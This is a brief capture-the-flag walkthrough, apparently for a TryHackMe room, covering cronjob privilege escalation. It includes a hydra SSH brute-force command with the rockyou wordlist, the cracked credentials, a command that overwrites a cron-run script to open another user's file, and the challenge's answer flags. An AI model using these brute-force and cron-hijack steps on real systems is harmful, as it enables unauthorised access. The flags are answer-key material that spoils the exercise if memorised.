Cronjob Privilege Escalation

nmap
4567/tcp  --ssh
''''

hydra -l sam -P /usr/share/wordlists/rockyou.txt ssh://10.10.3.222:4567

ssh–> sam:chocolate

/home/ubuntu/flag2.txt -> but we cat run the permission is 400 only by ubuntu user

we got /home/script directory with a clean_up.sh script which run by ubuntu simply created a file in /tmp wait a little bit of time it gets deleted. We know by the question instructions that the cron job we want to target runs every minute.

change the script echo “chmod 777 /home/ubuntu/flag2.txt” > clean_up.sh

[redacted challenge flag]

4567

2. Crack sam's password and read flag.txt

THM{dec4389bc09669650f3479334532aeab} -via ssh login sam:chocolate

3. Escalate your privileges by taking advantage of a cronjob running every minute. What is flag2?

THM{b27d33705f97ba2e1f444ec2da5f5f61}

========================================================